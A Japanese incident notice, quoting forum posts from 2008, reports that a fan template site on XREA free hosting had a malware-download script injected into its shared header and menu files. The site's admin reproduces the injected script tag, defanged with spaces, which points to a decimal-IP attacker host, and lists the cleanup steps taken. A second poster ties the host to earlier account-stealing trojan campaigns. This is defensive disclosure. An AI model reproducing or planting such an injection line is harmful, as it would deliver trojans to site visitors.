吟遊詩人スレテンプレサイト(http://bdbk.s41.xrea.com/)が、8月2日23:45頃~7日22:00頃までマルウェアダウンロードスクリプトが仕込まれた状態だった模様です。現在は管理人様の方で対応されていますが、原因が不明のため再発の可能性あり。ご注意ください。
以下詩人スレより。
793 名前:名も無き軍師[sage] 投稿日:08/08/07(木) 22:04:32 ID:********
○詩人スレ住人の方へ 大切なご連絡です○
かなり久しぶりに書き込みます。>>1のテンプレサイト管理人です。
さきほど気付いたのですが、8月2日23時45分頃~今まで、
テンプレサイト内のほぼ全ページに、
謎のスクリプトが、仕込まれてしまっていたようです。
仕込まれていたのは、下記のようなものです。
<script src= h t t p : // 1039045744 : 88 / jp.js ></script>
↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。
1039045744で検索すると、どうもアカウントハックを目的とするサイトのようだったので、
慌てて削除をしておきましたが、この期間中にアクセスされた方は、
もしかするとウィルスに感染しているかもしれません。
心当たりのある方は、一度ウィルスチェック等をしていただければと思います。
こんなことが起こるとは思いもよらず、どう対処すればいいのか混乱している状況ですが、
さしあたり、まずは報告をしておくべき、と考え、書き込みさせていただきました。
以上、よろしくお願いします。
794 名前:名も無き軍師[sage] 投稿日:08/08/08(金) 00:10:38 ID:********
>>793続報です。
○被害状況
テンプレサイトは、「左側メニュー」・「ヘッダ」・「フッタ」をどのページにも共通に読み込む作りになっているのですが、
この共通部品である、「左側メニュー」・「ヘッダ」の2つのファイルにスクリプトが埋め込まれてしまったため、
ほぼ全ページにスクリプトを仕込まれた状態になっていました。
なお、2つのファイルの更新時刻は、8月2日23時45分、8月2日23時49分でした。
○対応状況
どういう経緯でファイルが書き換えられてしまったのか不明なため、
さしあたりの対処として、下記3点を行いました。
・書き換えられていた2つのファイルの差し戻し
・FTPパスワードの変更
・TOPページに警告を掲載
とりあえずこれで様子をみたいと思いますが、
これ以外に何かするべき対策などあれば、お知らせいただけるとありがたいです。
よろしくお願いします。
795 名前:名も無き軍師[sage] 投稿日:08/08/08(金) 00:20:43 ID:*******
>>793
アカハクスレにレスへのリンク貼られてたので来てみました
指定ポートが異なりますが、h t t p : // 1039045744:XX~というアドレスは
今年6月にXREAの広告改竄によるアカウントハックが蔓延した際、
接続されていたトロイ置き場と同一です。
おそらくは今回も同様の罠が仕掛けられていたものと想定されます。
また、XREAの無料スペースをご利用されているようですが、
↑でも書いた通り、今年6月にXREAの広告サーバーが乗っ取られ、
一定の確率で「Flashplayerのバージョンが古い場合、閲覧しただけで
アカウントハックトロイが自動的にDL・実行される」という罠が、
6/5~6/17および6/26~6/27の間、無料スペースで表示義務のある
広告に仕込まれていました。
つまり、上記期間中はXREAの無料スペースを使用していたサイトが
全てアカウントハック罠サイトへと変えられていたわけです。
この問題の発生が現在のアカウントハック多発のきっかけともなっており、
貴HPも上記改竄被害を受けたHPの条件に当てはまります。
併せて周知いただければと思います。